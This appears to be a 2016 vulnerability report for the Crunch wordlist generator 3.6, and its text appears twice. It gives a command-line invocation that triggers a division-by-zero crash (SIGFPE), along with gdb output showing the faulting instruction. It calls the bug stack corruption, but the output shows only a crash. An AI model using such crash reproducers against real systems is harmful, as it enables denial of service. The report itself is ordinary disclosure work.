slayerlab/report.S

## report.S
Title    :  Crunch Wordlist (Ubuntu) stack corruption
Version  :  3.6
Date     :  2016-12-27
Vendor   :  https://sourceforge.net/projects/crunch-wordlist/
Impact   :  Low/Med
Contact  :  submit [dot] slayerowner [at] gmail.com
Twitter  :  @slayer_owner
tested   :  Ubuntu 16.10 desktop x86_64
Author   :  SLAYER OWNER
###############################################################################################
Description:
   - Crunch is an tool to built wordlist that runs under Unix-like environment
###############################################################################################
Bug:
   - The vulnerability invokes SIGFPE, a stack corruption (division by zero).
###############################################################################################
Impact:
   - That will trigger a denial of service condition
###############################################################################################
(gdb) r 0 0 blockbit -o 2wordlist_blockbit
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/crunch 0 0 blockbit -o 2wordlist_blockbit
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Crunch will now generate the following amount of data: 0 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 0

[New Thread 0x7ffff720f700 (LWP 2455)]

Thread 1 "crunch" received signal SIGFPE, Arithmetic exception.
0x000055555555c313 in ?? ()
(gdb) whatis $rip
type = void (*)()
(gdb) x/10i 0x000055555555c313
=> 0x55555555c313:      divq   0x204d7e(%rip)        # 0x555555761098
   0x55555555c31a:      lea    0x18e7(%rip),%rdx        # 0x55555555dc08
   0x55555555c321:      mov    %eax,%ecx
   0x55555555c323:      mov    0x204cce(%rip),%rax        # 0x555555760ff8
   0x55555555c32a:      mov    (%rax),%rdi
   0x55555555c32d:      xor    %eax,%eax
   0x55555555c32f:      callq  0x5555555555c0 <__fprintf_chk@plt>
   0x55555555c334:      mov    %r14,%rdi
   0x55555555c337:      callq  0x555555555400 <strlen@plt>
   0x55555555c33c:      add    %rax,%r12
	Title : Crunch Wordlist (Ubuntu) stack corruption
	Version : 3.6
	Date : 2016-12-27
	Vendor : https://sourceforge.net/projects/crunch-wordlist/
	Impact : Low/Med
	Contact : submit [dot] slayerowner [at] gmail.com
	Twitter : @slayer_owner
	tested : Ubuntu 16.10 desktop x86_64
	Author : SLAYER OWNER
	###############################################################################################
	Description:
	- Crunch is an tool to built wordlist that runs under Unix-like environment
	###############################################################################################
	Bug:
	- The vulnerability invokes SIGFPE, a stack corruption (division by zero).
	###############################################################################################
	Impact:
	- That will trigger a denial of service condition
	###############################################################################################
	(gdb) r 0 0 blockbit -o 2wordlist_blockbit
	The program being debugged has been started already.
	Start it from the beginning? (y or n) y
	Starting program: /usr/bin/crunch 0 0 blockbit -o 2wordlist_blockbit
	[Thread debugging using libthread_db enabled]
	Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
	Crunch will now generate the following amount of data: 0 bytes
	0 MB
	0 GB
	0 TB
	0 PB
	Crunch will now generate the following number of lines: 0

	[New Thread 0x7ffff720f700 (LWP 2455)]

	Thread 1 "crunch" received signal SIGFPE, Arithmetic exception.
	0x000055555555c313 in ?? ()
	(gdb) whatis $rip
	type = void (*)()
	(gdb) x/10i 0x000055555555c313
	=> 0x55555555c313: divq 0x204d7e(%rip) # 0x555555761098
	0x55555555c31a: lea 0x18e7(%rip),%rdx # 0x55555555dc08
	0x55555555c321: mov %eax,%ecx
	0x55555555c323: mov 0x204cce(%rip),%rax # 0x555555760ff8
	0x55555555c32a: mov (%rax),%rdi
	0x55555555c32d: xor %eax,%eax
	0x55555555c32f: callq 0x5555555555c0 <__fprintf_chk@plt>
	0x55555555c334: mov %r14,%rdi
	0x55555555c337: callq 0x555555555400 <strlen@plt>
	0x55555555c33c: add %rax,%r12